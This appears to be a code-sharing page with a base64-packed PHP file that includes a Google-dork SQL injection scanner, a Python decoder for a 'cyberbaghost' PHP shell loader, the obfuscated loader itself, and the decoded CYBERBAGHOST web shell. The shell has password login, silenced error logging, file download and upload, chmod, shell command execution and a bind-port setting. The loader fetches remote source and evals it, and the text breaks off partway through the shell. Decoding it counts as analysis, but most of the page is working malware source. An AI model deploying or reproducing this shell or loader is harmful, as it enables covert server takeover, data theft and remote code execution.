V2ZW50LnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnByb2R1Y3QtaXRlbS5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpzcWwucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6bmV3c192aWV3LnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnNlbGVjdF9iaWJsaW8ucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6aHVtb3IucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6YWJvdXRib29rLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOm9nbF9pbmV0LnBocD9vZ2xfaWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpmaWNoZV9zcGVjdGFjbGUucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6Y29tbXVuaXF1ZV9kZXRhaWwucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6c2VtLnBocDM/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDprYXRlZ29yaWUucGhwND9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOm5ld3MucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6aW5kZXgucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6ZmFxMi5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpzaG93X2FuLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnByZXZpZXcucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6bG9hZHBzYi5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpvcGluaW9ucy5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpzcHIucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cGFnZXMucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6YW5ub3VuY2UucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6Y2xhbmVrLnBocDQ/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpwYXJ0aWNpcGFudC5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpkb3dubG9hZC5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDptYWluLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnJldmlldy5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpjaGFwcGllcy5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpyZWFkLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnByb2RfZGV0YWlsLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnZpZXdwaG90by5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDphcnRpY2xlLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnBlcnNvbi5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpwcm9kdWN0aW5mby5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpzaG93aW1nLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnZpZXcucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6d2Vic2l0ZS5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpob3N0aW5nX2luZm8ucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6Z2FsbGVyeS5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpydWIucGhwP2lkcj08L29wdGlvbj48b3B0aW9uPmludXJsOnZpZXdfZmFxLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOmFydGlrZWxpbmZvLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOmRldGFpbC5waHA/SUQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDppbmRleC5waHA/PTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cHJvZmlsZV92aWV3LnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOmNhdGVnb3J5LnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnB1YmxpY2F0aW9ucy5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpmZWxsb3dzLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOmRvd25sb2Fkc19pbmZvLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnByb2RfaW5mby5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpzaG9wLnBocD9kbz1wYXJ0JmlkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cHJvZHVjdGluZm8ucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6Y29sbGVjdGlvbml0ZW0ucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6YmFuZF9pbmZvLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnByb2R1Y3QucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cmVsZWFzZXMucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cmF5LnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnByb2R1aXQucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cG9wLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnNob3BwaW5nLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnByb2R1Y3RkZXRhaWwucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cG9zdC5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDp2aWV3c2hvd2RldGFpbC5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpjbHVicGFnZS5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDptZW1iZXJJbmZvLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnNlY3Rpb24ucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6dGhlbWUucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cGFnZS5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpzaHJlZGRlci1jYXRlZ29yaWVzLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnRyYWRlQ2F0ZWdvcnkucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cHJvZHVjdF9yYW5nZXNfdmlldy5waHA/SUQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpzaG9wX2NhdGVnb3J5LnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnRyYW5zY3JpcHQucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6Y2hhbm5lbF9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOml0ZW1faWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpuZXdzaWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDp0cmFpbmVycy5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpuZXdzLWZ1bGwucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6bmV3c19kaXNwbGF5LnBocD9nZXRpZD08L29wdGlvbj48b3B0aW9uPmludXJsOmluZGV4Mi5waHA/b3B0aW9uPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cmVhZG5ld3MucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6dG9wMTAucGhwP2NhdD08L29wdGlvbj48b3B0aW9uPmludXJsOm5ld3NvbmUucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6ZXZlbnQucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cHJvZHVjdC1pdGVtLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnNxbC5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDphYm91dGJvb2sucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cHJldmlldy5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpsb2FkcHNiLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnBhZ2VzLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOm1hdGVyaWFsLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOmNsYW5lay5waHA0P2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6YW5ub3VuY2UucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6Y2hhcHBpZXMucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cmVhZC5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDp2aWV3YXBwLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOnZpZXdwaG90by5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpydWIucGhwP2lkcj08L29wdGlvbj48b3B0aW9uPmludXJsOmdhbGVyaV9pbmZvLnBocD9sPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6cmV2aWV3LnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOmluaXppYXRpdmEucGhwP2luPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6Y3VycmljdWx1bS5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpsYWJlbHMucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6c3RvcnkucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6bG9vay5waHA/SUQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpuZXdzb25lLnBocD9pZD08L29wdGlvbj48b3B0aW9uPmludXJsOmFib3V0Ym9vay5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDptYXRlcmlhbC5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpvcGluaW9ucy5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDphbm5vdW5jZS5waHA/aWQ9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpydWIucGhwP2lkcj08L29wdGlvbj48b3B0aW9uPmludXJsOmdhbGVyaV9pbmZvLnBocD9sPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6dGVrc3QucGhwP2lkdD08L29wdGlvbj48b3B0aW9uPmludXJsOm5ld3NjYXQucGhwP2lkPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6bmV3c3RpY2tlcl9pbmZvLnBocD9pZG49PC9vcHRpb24+PG9wdGlvbj5pbnVybDpydWJyaWthLnBocD9pZHI9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpydWJwLnBocD9pZHI9PC9vcHRpb24+PG9wdGlvbj5pbnVybDpvZmZlci5waHA/aWRmPTwvb3B0aW9uPjxvcHRpb24+aW51cmw6YXJ0LnBocD9pZG09PC9vcHRpb24+PG9wdGlvbj5pbnVybDp0aXRsZS5waHA/aWQ9PC9vcHRpb24+PC9zZWxlY3Q+DQoJCQk8aW5wdXQgdHlwZT0idGV4dCIgaWQ9ImRvcmsiIG5hbWU9ImRvcmsiIHZhbHVlPSI8P3BocCBlY2hvIChpc3NldCgkX1BPU1RbJ2RvcmsnXXswfSkpID8gaHRtbGVudGl0aWVzKCRfUE9TVFsnZG9yayddKSA6ICdpbnVybDpwaHA/aWQ9JzsgPz4iIC8+DQoJCQk8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iU3RhcnQiIGlkPSJidXR0b24iLz4NCgkJPC9mb3JtPg0KCQk8P3BocA0KCQkJaWYoaXNzZXQoJF9QT1NUWydkb3JrJ117MH0pKXsNCgkJCQkNCgkJCQllY2hvICc8ZGl2IGlkPSJyZXN1bHQiPlN0YXJ0Li48YnI+JzsJCQkNCgkJCQlsZXRJdEJ5KCk7CQkJDQoJCQkJZm9yKCRnb29nbGVQYWdlID0gMTsgJGdvb2dsZVBhZ2UgPD0gMTA7ICRnb29nbGVQYWdlKyspew0KCQkJCQ0KCQkJCQkkZ29vZ2xlUmVzdWx0ID0gZ29vZ2xlX3RoYXQoJF9QT1NUWydkb3JrJ10sICRnb29nbGVQYWdlKTsNCgkJCQkJaWYoISRnb29nbGVSZXN1bHQpew0KCQkJCQkJZWNobyAnZ29vZ2xlIGRvbnQgaGV2ZSBtb3JlIHJlc3VsdCwgc28gSSBkb25lLi4oPyknOw0KCQkJCQkJYnJlYWs7DQoJCQkJCX0NCgkJCQkJDQoJCQkJCWZvcigkdmljdGltID0gMDsgJHZpY3RpbSA8IHNpemVvZigkZ29vZ2xlUmVzdWx0KTsgJHZpY3RpbSsrKXsNCgkJCQkJDQoJCQkJCQlpZihjaGVja19pbmplY3Rpb24oJGdvb2dsZVJlc3VsdFskdmljdGltXVsndW5lc2NhcGVkVXJsJ10pKXsNCgkJCQkJCQllY2hvICc8c3BhbiBjbGFzcz0iWSI+JzsNCgkJCQkJCS8vCWZpbGVfcHV0X2NvbnRlbnRzKCJsb2cudHh0IiwgInskZ29vZ2xlUmVzdWx0WyR2aWN0aW1dWyd1bmVzY2FwZWRVcmwnXX1cbiIpOw0KCQkJCQkJfQ0KCQkJCQkJZWxzZSBlY2hvICc8c3BhbiBjbGFzcz0iWCI+JzsNCgkJCQkJCQ0KCQkJCQkJZWNobyAiPGEgaHJlZj1cInskZ29vZ2xlUmVzdWx0WyR2aWN0aW1dWyd1bmVzY2FwZWRVcmwnXX1cIiB0YXJnZXQ9J19ibGFuayc+eyRnb29nbGVSZXN1bHRbJHZpY3RpbV1bJ3RpdGxlTm9Gb3JtYXR0aW5nJ119PC9hPjwvc3Bhbj5cbiI7DQoJCQkJCQlsZXRJdEJ5KCk7DQoJCQkJCX0NCgkJCQl9DQoJCQkJZWNobyAnPC9kaXY+JzsNCgkJCX0NCgkJPz4NCgkJUG93ZXJkIEJ5IGdvb2dsZS4NCgk8L2JvZHk+DQo8L2h0bWw+DQo=';
// ================
function tulis($text){
$text = gzinflate(base64_decode($text));
return $text;
}
function b64dec($string) {
return base64_decode($string);
}
//echo tulis($satu);
//echo b64dec($configshell);
//echo b64dec($back);
//echo b64dec($cp);
//echo b64dec($htaccess);
//echo b64dec($pd);
//echo b64dec($pd2);
echo b64dec($scansqli);
?>
Raw
decoderforloader.py
#!/usr/bin/env python
__author__ = 'widnyana'
"""
decoder for cyberbaghost php shel loader
"""
import base64
asu = "PD9waHAgZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFOQ2tCcGJtbGZjMlYwS0NkdmRYUndkWFJmWW5WbVptVnlhVzVuSnl3d0tUc05Da0JwYm1sZmMyVjBLQ2RrYVhOd2JHRjVYMlZ5Y205eWN5Y3NJREFwT3cwS0pIUmxlSFFnUFNCbWFXeGxYMmRsZEY5amIyNTBaVzUwY3lnbmFIUjBjRG92TDJONVltVnlZbUZuYUc5emRDNWlaWE5oWW1FdVkyOXRMMjVuWVhCaGFXNGdiR2xoZEdsdUlITnZkWEpqWldOdlpHVXVkSGgwSnlrN0RRcEFaWFpoYkNoemRISmZjbTkwTVRNb1ozcHBibVpzWVhSbEtITjBjbDl5YjNReE15aGlZWE5sTmpSZlpHVmpiMlJsS0Nna2RHVjRkQ2twS1NrcEtUc05DajgrIikpOyA/Pg=="
kopet = True
while kopet:
asu = base64.b64decode(asu)
try:
asu = asu.replace('<?php eval("?>".base64_decode("', "")
asu = asu.replace(')); ?>', '')
except:
kopet = False
print asu
Raw
loader.php
<?php
echo base64_decode("PD9waHAgZXZhbCgiPz4iLmJhc2U2NF9kZWNvZGUoIlBEOXdhSEFOQ2tCcGJtbGZjMlYwS0NkdmRYUndkWFJmWW5WbVptVnlhVzVuSnl3d0tUc05Da0JwYm1sZmMyVjBLQ2RrYVhOd2JHRjVYMlZ5Y205eWN5Y3NJREFwT3cwS0pIUmxlSFFnUFNCbWFXeGxYMmRsZEY5amIyNTBaVzUwY3lnbmFIUjBjRG92TDJONVltVnlZbUZuYUc5emRDNWlaWE5oWW1FdVkyOXRMMjVuWVhCaGFXNGdiR2xoZEdsdUlITnZkWEpqWldOdlpHVXVkSGgwSnlrN0RRcEFaWFpoYkNoemRISmZjbTkwTVRNb1ozcHBibVpzWVhSbEtITjBjbDl5YjNReE15aGlZWE5sTmpSZlpHVmpiMlJsS0Nna2RHVjRkQ2twS1NrcEtUc05DajgrIikpOyA/Pg==");
?>
Raw
plain.txt
<?php
/*
* decoded by widnyana p
*
* you mad bro?
*/
///////////#HAYO NGAPAIN NGELIATIN SOURCECODENYA
/////////////////////////////////////////
$auth_pass = "a97b4f6b59f7cd17972511870c5bce42";
$color = "#008B8B";
$default_action = 'FilesMan';
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', '2.1');
if( get_magic_quotes_gpc() ) {
function stripslashes_array($array) {
return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
}
$_POST = stripslashes_array($_POST);
}
function printLogin() {
?>
<TITLE>CYBERBAGHOST</TITLE>
<embed src="http://error-404.do.am/file/Welcome.swf" width="0" height="0" allowfullscreen="true" allowscriptaccess="always"></embed>
<body BGCOLOR="black">
<p><center><img src="https://fbcdn-photos-c-a.akamaihd.net/hphotos-ak-xfa1/t1.0-0/10314022_1415881775363329_5618385910859414533_n.jpg" width="265" height="250"></center>
<hr>
<address></address>
<style>
input { margin:0;background-image: url("http://3.bp.blogspot.com/-yEVdif3Bi_U/Ts32PtuIGBI/AAAAAAAAAgo/Ce1ujGXZ6RE/s800/matrix.gif");
</style>
<center>
<form method=post >
<input type=password name=pass >
</form></center>
<?php
exit;
}
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
if( empty( $auth_pass ) ||
( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
else
printLogin();
@ini_set('log_errors',0);
@ini_set('display_errors',0);
@ini_set('output_buffering',0);
@ini_set('file_uploads',1);
if(isset($_GET['dl']) && ($_GET['dl'] != "")){
$file = $_GET['dl'];
$filez = @file_get_contents($file);
header("Content-type: application/octet-stream");
header("Content-length: ".strlen($filez));
header("Content-disposition: attachment; filename=\"".basename($file)."\";");
echo $filez;
exit;
}
elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){
$file = $_GET['dlgzip'];
$filez = gzencode(@file_get_contents($file));
header("Content-Type:application/x-gzip\n");
header("Content-length: ".strlen($filez));
header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
echo $filez;
exit;
}
// view image
if(isset($_GET['img'])){
@ob_clean();
$d = magicboom($_GET['y']);
$f = $_GET['img'];
$inf = @getimagesize($d.$f);
$ext = explode($f,".");
$ext = $ext[count($ext)-1];
@header("Content-type: ".$inf["mime"]);
@header("Cache-control: public");
@header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
@header("Cache-control: max-age=".(60*60*24*7));
@readfile($d.$f);
exit;
}
// server software
$software = getenv("SERVER_SOFTWARE");
// check safemode
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE;
// uname -a
$system = @php_uname();
// detector
function showstat($stat) {if ($stat=="on") {return "<b><font style='color:#00FF00'>ON</font></b>";}else {return "<b><font style='color:#ff0000'>OFF</font></b>";}}
function testmysql() {if (function_exists('mysql_connect')) {return showstat("on");}else {return showstat("off");}}
function testcurl() {if (function_exists('curl_version')) {return showstat("on");}else {return showstat("off");}}
function testwget() {if (exe('wget --help')) {return showstat("on");}else {return showstat("off");}}
function testoracle() { if (function_exists('ocilogon')) {return showstat("on"); }else {return showstat("off"); }}
function testmssql() { if (function_exists('mssql_connect')) {return showstat("on"); }else {return showstat("off"); }}
function testperl() {if (exe('perl -h')) {return showstat("on");}else {return showstat("off");}}
function testpython() {if (exe('python -h')) {return showstat("on");}else {return showstat("off");}}
function testruby() {if (exe('ruby -h')) {return showstat("on");}else {return showstat("off");}}
function testgcc() {if (exe('gcc --help')) {return showstat("on");}else {return showstat("off");}}
function testjava() {if (exe('java -h')) {return showstat("on");}else {return showstat("off");}}
// check os
if(strtolower(substr($system,0,3)) == "win") $win = TRUE;
else $win = FALSE;
// change directory
if(isset($_GET['y'])){
if(@is_dir($_GET['view'])){
$pwd = $_GET['view'];
@chdir($pwd);
}
else{
$pwd = $_GET['y'];
@chdir($pwd);
}
}
//hdd
function convertByte($s) {
if($s<=0) return 0;
$w = array('B','KB','MB','GB','TB','PB','EB','ZB','YB');
$e = floor(log($s)/log(1024));
return sprintf('%.2f '.$w[$e], ($s/pow(1024, floor($e))));
}
//
// username, id, shell prompt and working directory
if(!$win){
if(!$user = rapih(exe("whoami"))) $user = "";
if(!$id = rapih(exe("id"))) $id = "";
$prompt = $user." \$ ";
$pwd = @getcwd().DIRECTORY_SEPARATOR;
}
else {
$user = @get_current_user();
$id = $user;
$prompt = $user." &gt;";
$pwd = realpath(".")."\\";
// find drive letters
$v = explode("\\",$d);
$v = $v[0];
foreach (range("A","Z") as $letter)
{
$bool = @is_dir($letter.":\\");
if ($bool)
{
$letters .= "<a href=\"?y=".$letter.":\\\">[ ";
if ($letter.":" != $v) {$letters .= $letter;}
else {$letters .= "<span class=\"gaya\">".$letter."</span>";}
$letters .= " ]</a> ";
}
}
}
function getrealip(){
if (!empty($_SERVER['HTTP_CLIENT_IP']))
{ $ip=$_SERVER['HTTP_CLIENT_IP'];
}elseif (!empty($SERVER['HTTP_X_FORWARDED_FOR']))
//TO CHEK IP IS PASS FROM PROXY
{ $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
}else { $ip=$_SERVER['REMOTE_ADDR'];
}
return $ip;
}
function showdisablefunctions() {
if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:#ff0000'><b>".$disablefunc."</b></span>"; }
else { return "<span style='color:#00FF00'><b>NONE</b></span>"; }
}
if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
else $posix = FALSE;
// server ip
$server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
// your ip ;-)
$my_ip = $_SERVER['REMOTE_ADDR'];
$admin_id=$_SERVER['SERVER_ADMIN'];
$bindport = "13123";
$bindport_pass = "b374k";
//wilworm
$release = @php_uname('r');
$kernel = @php_uname('s');
$millink='http://milw0rm.com/search.php?dong=';
if( strpos('Linux', $kernel) !== false )
$millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
else
$millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
if(!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(@posix_geteuid());
$gid = @posix_getgrgid(@posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
// separate the working direcotory
$pwds = explode(DIRECTORY_SEPARATOR,$pwd);
$pwdurl = "";
for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){
$pathz = "";
for($j = 0 ; $j <= $i ; $j++){
$pathz .= $pwds[$j].DIRECTORY_SEPARATOR;
}
$pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
}
// rename file or folder
if(isset($_POST['rename'])){
$old = $_POST['oldname'];
$new = $_POST['newname'];
@rename($pwd.$old,$pwd.$new);
$file = $pwd.$new;
}
if(isset($_POST['uploadcompt'])){
if(is_uploaded_file($_FILES['file']['tmp_name'])){
$path = magicboom($_POST['path']);
$fname = $_FILES['file']['name'];
$tmp_name = $_FILES['file']['tmp_name'];
$pindah = $path.$fname;
$stat = @move_uploaded_file($tmp_name,$pindah);}
}
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo ''; }
else { echo ''; }
}
if(isset($_POST['chmod'])){
$name = $_POST['name'];
$value = $_POST['newvalue'];
if (strlen($value)==3){
$value = 0 . "" . $value;}
@chmod($pwd.$name,octdec($value));
$file = $pwd.$name;}
if(isset($_POST['chmod_folder'])){
$name = $_POST['name'];
$value = $_POST['newvalue'];
if (strlen($value)==3){
$value = 0 . "" . $value;}
@chmod($pwd.$name,octdec($value));
$file = $pwd.$name;}
//////////////////////////////////
// print useful info
$buff = "Software : <b>".$software."</b><br />";
$buff .= "System OS : <b>".$system." | <a href='http://www.google.com/search?q=".urlencode(@php_uname())."' title='Search System OS' target='_blank'><font style='color:#ff0000'>[ Google ]</font></a> | <a href='http://www.exploit-db.com/search/?action=search&filter_exploit_text=".urlencode( $kernel . ' ' . substr($release,0,3) )."' title='Exploit DB' target='_blank'><font style='color:#ff0000'>[ Exploit DB ]</font></a> | <a href='http://www.shodanhq.com/search?q=".urlencode( $kernel . ' ' . substr($release,0,3) )."' title='Exploit DB' target='_blank'><font style='color:#ff0000'>[ Shodan ]</font> </b><br />";
if($id != "") $buff .= "ID : <b>".$id."</b><br />";
$buff .= "PHP Version : <b>".phpversion()."</b> ON <b>".php_sapi_name()."</b><br />";
$buff .= "Server ip : <b>".$server_ip."</b> <span class=\"gaya\"> | </span> Your ip Surving : <b><font style='color:#ff0000'>".$my_ip."</font></b><span class=\"gaya\"> | </span> Your Real ip : <b><a href='http://www.dnsstuff.com/tools?runFromMain=".getrealip()."&toolType=traceroute' title='Traceroute Your IP' target='_blank'><font style='color:#ff0000'>".getrealip()."<font></a></b><span class=\"gaya\"> | </span> Admin : <b>".$admin_id."</b><br />";
$buff .= "Free Disk: "."<span style='color:#00FF1E'><b>".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."</b></span><br />";
if($safemode) $buff .= "Safemode: <span class=\"gaya\"><font style='color:#ff0000'><b>ON</b></font></span><br />";
else $buff .= "Safemode: <span class=\"gaya\"><b>OFF</b></span><br />";
$buff .= "Disabled Functions: ".showdisablefunctions()."<br />";
$buff .= "MySQL: ".testmysql()."&nbsp;&nbsp;|&nbsp;&nbsp;MSSQL: ".testmssql()."&nbsp;&nbsp;|&nbsp;&nbsp;Oracle: ".testoracle()."&nbsp;&nbsp;|&nbsp;&nbsp;Perl: ".testperl()."&nbsp;&nbsp;|&nbsp;&nbsp;Python: ".testpython()."&nbsp;&nbsp;|&nbsp;&nbsp;Ruby: ".testruby()."&nbsp;&nbsp;|&nbsp;&nbsp;Java: ".testjava()."&nbsp;&nbsp;|&nbsp;&nbsp;GCC: ".testgcc()."&nbsp;&nbsp;|&nbsp;&nbsp;cURL: ".testcurl()."&nbsp;&nbsp;|&nbsp;&nbsp;WGet: ".testwget()."<br>";
$buff .= "<font color=00ff00 ><b>".$letters."&nbsp;&gt;&nbsp;".$pwdurl."</b></font>";
$injbuff = "";
eval(base64_decode($injbuff));
function rapih($text){
return trim(str_replace("<br />","",$text));
}
function magicboom($text){
if (!get_magic_quotes_gpc()) {
return $text;
}
return stripslashes($text);
}
function showdir($pwd,$prompt){
$fname = array();
$dname = array();
if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
else $posix = FALSE;
$user = "????:????";
if($dh = @scandir($pwd)){
foreach($dh as $file){
if(is_dir($file)){
$dname[] = $file;
}
elseif(is_file($file)){
$fname[] = $file;
}
}
}
else{
if($dh = @opendir($pwd)){
while($file = @readdir($dh)){
if(@is_dir($file)){
$dname[] = $file;
}
elseif(@is_file($file)){
$fname[] = $file;
}
}
@closedir($dh);
}
}
sort($fname);
sort($dname);
$path = @explode(DIRECTORY_SEPARATOR,$pwd);
$tree = @sizeof($path);
$parent = "";
$buff = "
<form action=\"?y=".$pwd."&amp;x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
<table class=\"cmdbox\" style=\"width:50%;\">
<tr><td><b>$prompt</b></td><td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>
</form>
<form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\">
<input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
<tr><td><b>view file/folder</b></td><td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"".$pwd."\" /><input class=\"inputzbut\" type=\"submit\" value=\"View !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>
</form></table><table class=\"explore\">
<tr><th>name</th><th style=\"width:80px;\">size</th><th style=\"width:210px;\">owner:group</th><th style=\"width:80px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:190px;\">actions</th></tr>
";
if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
else $parent = $pwd;
foreach($dname as $folder){
if($folder == ".") {
if(!$win && $posix){
$name=@posix_getpwuid(@fileowner($folder));
$group=@posix_getgrgid(@filegroup($folder));
$owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
}
else {
$owner = $user;
}
$buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>LINK</td>
